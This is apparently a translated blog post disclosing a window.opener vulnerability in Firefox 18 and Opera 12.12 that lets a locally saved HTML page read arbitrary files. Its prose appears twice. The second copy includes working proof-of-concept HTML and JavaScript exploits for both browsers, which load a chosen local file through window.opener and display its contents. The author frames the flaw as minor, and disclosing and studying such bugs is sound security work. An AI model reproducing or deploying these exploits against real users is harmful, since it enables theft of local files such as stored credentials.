Zero-day vulnerability in Firefox 18 and Opera 12.12
Having continued to dig and beat the security issue with window.opener, I came across a rather amusing vulnerability in Firefox and Opera browsers.
The vulnerability allows a page stored on your computer to read arbitrary files on your system.
Vulnerability exists due to insufficient control over the change of window.opener.
The attacker can embed an arbitrary HTML code into the page, and when the page is launched on the local system, it is possible to read the contents of almost any file (of course, with privileges).
')
Because the vulnerability is pretty simple, I immediately publish exploit. The window.opener problem can be found here .
Video showing this vulnerability:
The vulnerability in this browser is similar, but here it is more difficult to exploit.
For full access to the data, the code must be placed in the root of the disk.
On nix'ah not tested, and therefore, the behavior of the code in nix'ah, I can not speak.
Here the code consists of two files, to bypass restrictions in the browser.
File first (Fir.html):
Second file (payload.html):
Video:
The fact that exploit can only work while being on the target system does not make this vulnerability critical.
However, those who like to keep pages on your computer, I ask you to carefully choose resources :)
UPD
For those who cannot understand why this is a vulnerability.
I give an example: You found an interesting article on the Internet and suppose you are driving on nature. There is no Internet, but you really want to read the article.
But you, in advance, saved the HTML document on your computer. And here you are sitting by the fire, you were bitten by mosquitoes and you decided to read this document. Well, it is said, done! Opened, read, forgotten.
And in the afternoon you return home, and access to your account in the social. there is no network. After all, you left a login and password on the hard disk in the pass * .txt file.
Do not consider this vulnerability as critical. This is nothing more than a toy.
But sometimes, even toys shoot;)
UPD2: it is possible to browse directories, I won’t provide exploit, because it’s not good.
The vulnerability allows a page stored on your computer to read arbitrary files on your system.
Vulnerability exists due to insufficient control over the change of window.opener.
The attacker can embed an arbitrary HTML code into the page, and when the page is launched on the local system, it is possible to read the contents of almost any file (of course, with privileges).
')
Opera
Because the vulnerability is pretty simple, I immediately publish exploit. The window.opener problem can be found here .
<html> <body> <script> if((navigator.userAgent.indexOf("Opera") != -1) && (window.location.protocol == "file:")) { // Opera file var file=prompt("Example: C:/file.txt "); // ? if(file){ console.log("File: "+file); document.write("<center>"+ "<a href='data:text/html,"+ // , data "<script>"+ "if(window.opener){"+ // window.opener "window.opener.location.replace(%22file://"+window.location.hostname+"/"+file+"%22);"+ // "};%3C%2Fscript%3E"+ "%3Cscript%3E"+ // script, "alert(window.opener.document.body.innerHTML);"+ // :) "%3C%2Fscript%3E"+ "' target='_blank'>"+ //target= _blank "CLICK-CLICK</a>"); }} </script> </body> </html> Video showing this vulnerability:
Firefox
The vulnerability in this browser is similar, but here it is more difficult to exploit.
For full access to the data, the code must be placed in the root of the disk.
On nix'ah not tested, and therefore, the behavior of the code in nix'ah, I can not speak.
Here the code consists of two files, to bypass restrictions in the browser.
File first (Fir.html):
<html> <body> <script> if((navigator.userAgent.indexOf("Firefox") != -1) && (window.location.protocol == "file:")){ // Firefox file document.write("<center>"+ "<a href='./payload.html'"+ // payload.html " target='_blank'>CLICK-CLICK</a>"); //target=_blank }; </script> </body> </html> Second file (payload.html):
<html> <body> <script> var file=prompt('Example: C:/file.txt'); console.log(file); window.opener.location="file://localhost/"+file; </script> <script> var al=function(){alert(window.opener.document.body.innerHTML)}; // while(!window.opener.document.body){ //window.opener.document.body=null alert('Click OK'); // al(); // }; </script> </body> </html> Video:
Conclusion
The fact that exploit can only work while being on the target system does not make this vulnerability critical.
However, those who like to keep pages on your computer, I ask you to carefully choose resources :)
UPD
For those who cannot understand why this is a vulnerability.
I give an example: You found an interesting article on the Internet and suppose you are driving on nature. There is no Internet, but you really want to read the article.
But you, in advance, saved the HTML document on your computer. And here you are sitting by the fire, you were bitten by mosquitoes and you decided to read this document. Well, it is said, done! Opened, read, forgotten.
And in the afternoon you return home, and access to your account in the social. there is no network. After all, you left a login and password on the hard disk in the pass * .txt file.
Do not consider this vulnerability as critical. This is nothing more than a toy.
But sometimes, even toys shoot;)
UPD2: it is possible to browse directories, I won’t provide exploit, because it’s not good.
Source: https://habr.com/ru/post/165339/
All Articles